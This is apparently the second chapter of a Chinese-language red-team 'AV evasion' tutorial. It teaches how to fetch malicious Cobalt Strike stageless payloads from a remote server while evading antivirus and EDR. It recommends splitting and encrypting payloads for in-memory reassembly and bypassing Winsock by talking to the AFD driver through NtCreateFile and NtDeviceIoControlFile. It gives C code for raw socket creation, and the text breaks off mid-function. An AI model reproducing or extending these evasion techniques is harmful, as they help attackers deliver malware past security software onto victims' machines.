红队免杀培训第二章-使用系统调用http 协议下载恶意载荷

​ 这是红队免杀培训的第二章，后续会继续推出红队免杀培训的一些小tips，等后面把这系列更完了，大家把所有的技术点窜起来一起用，那就是乱杀，上一章说了如何避免申请可执行内存块，执行shellcode，这一章将讲如何使用系统调用下载恶意载荷。

前言：

​ 从杀软的行为分析来看，就拿cs的通信协议来讲，stage 的载荷在行为上是明显比stageless载荷多很多的，其中不免一些通信协议的特征，分析过的都知道，stage只是个前置载荷，后续会下更大的功能更全的载荷，因为之前做免杀卡巴的时候就注意到了，静态全免，但是在下回来更大的载荷的时候爆毒了，后面分析，卡巴对cs的通信协议进行拦截，从云沙箱的检测来看，stage 爆毒数明显是比stageless多的。

​ 所以我个人建议，为了彻底过静态（加载器和shellcode分离的方式），把stageless放在远程服务器，甚至可以小心机一点，把载荷分成几个小的stageless加密起来，然后在内存中重组就行，那么涉及到通信协议，我们如何吧stageless下载回本地，根据现在的主流看法，http协议和https协议是最适合的，因为更贴近正常的用户使用的协议，不过考虑到杀软和edr对windows api的监控，所以这里采用系统调用的方式来实现http通信功能。

原理和准备：

Winsock是一种能使Windows程序通过任意网络传输协议发送数据的API，windows 的API 一般是由更底层的api或多个api封装而成的函数接口，我们要绕过windsock 直接与 AFD 驱动程序进行通信的话，我们就需要探查Winsock中具体哪些函数api是起到作用的，

我们发现，通过NtCreateFile和NtDeviceIoControlFile就能直接与 AFD 驱动程序进行通信。

1.首先通信需要创建一个socket，我们调用NtCreateFile来打开\Device\Afd\Endpoint对象，socket属性（地址族、协议类型等）是使用数据结构体来指定的，该结构作为“扩展属性”传递给NtCreateFile 函数。

创建socket示例代码：（ipv4 TCP）：

DWORD NTSockets_CreateTcpSocket(NTSockets_SocketDataStruct *pSocketData)
{
   
	IO_STATUS_BLOCK IoStatusBlock;
	HANDLE hEvent = NULL;
	HANDLE hSocket = NULL;
	OBJECT_ATTRIBUTES ObjectAttributes;
	NTSockets_SocketDataStruct SocketData;
	UNICODE_STRING ObjectFilePath;
	DWORD dwStatus = 0;
	BYTE bExtendedAttributes[] =
	{
   
		0x00, 0x00, 0x00, 0x00, 0x00, 0x0F, 0x1E, 0x00, 0x41, 0x66, 0x64, 0x4F, 0x70, 0x65, 0x6E, 0x50,
		0x61, 0x63, 0x6B, 0x65, 0x74, 0x58, 0x58, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x02, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x60, 0xEF, 0x3D, 0x47, 0xFE
	};

	//创建状态事件
	hEvent = CreateEvent(NULL, 0, 0, NULL);
	if(hEvent == NULL)
	{
   
		return 1;
	}

	//设置 afd 端点路径
	memset((void*)&ObjectFilePath, 0, sizeof(ObjectFilePath));
	ObjectFilePath.Buffer = L"\\Device\\Afd\\Endpoint";
	ObjectFilePath.Length = wcslen(ObjectFilePath.Buffer) * sizeof(wchar_t);
	ObjectFilePath.MaximumLength = ObjectFilePath.Length;

	// 初始化对象属性